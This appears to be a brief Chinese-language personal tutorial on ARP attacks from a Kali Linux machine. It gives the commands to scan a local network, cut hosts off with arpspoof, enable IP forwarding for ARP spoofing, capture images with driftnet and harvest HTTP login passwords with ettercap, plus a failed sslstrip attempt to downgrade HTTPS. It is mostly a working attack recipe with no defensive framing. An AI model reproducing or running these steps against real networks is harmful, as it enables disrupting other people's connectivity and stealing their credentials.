原理
参考:https://zhuanlan.zhihu.com/p/28818627
https://baijiahao.baidu.com/s?id=1633211639846187414&wfr=spider&for=pc
https://www.anquanke.com/post/id/151762
配置网络
使用kali攻击主机
将虚拟机kali网络连接模式设置为桥接
打开配置文件
1 | vi /etc/network/interfaces |
修改为以下
1 | # This file describes the network interfaces available on your system |
重启网络服务
1 | sevice networking restart |
ARP断网攻击
1 | fping -asg **.**.**.0/24 |
1 | nmap -sP **.**.**.0/24 |
扫描内网主机
1 | arpspoof -i 网卡名 -t 目标网关地址 目标IP地址 |
若出现arpspoof: couldn’t arp for host,可以尝试更换虚拟机网络连接模式或更换网卡
ARP欺骗
开启流量转发功能
1 | echo 1 >> /proc/sys/net/ipv4/ip_forward |
使用arpspoof
(此时ARP断网攻击会失效,需要将参数改回默认值0才能断网)
1 | arpspoof -i 网卡名 -t 目标网关地址 目标IP地址 |
使用driftnet图片流量监控
1 | driftnet -i 网卡名 |
ettercap嗅探 抓取账号密码(仅限http协议)
1 | ettercap -Tq -i 网卡名 |
-Tq 表示文本模式、安静模式
OJ..
1 | sslstrip -a -f -k |
将HTTPS的协议还原为HTTP,这样应该就可以嗅探https协议的网站,但尝试了几次还没有成功。。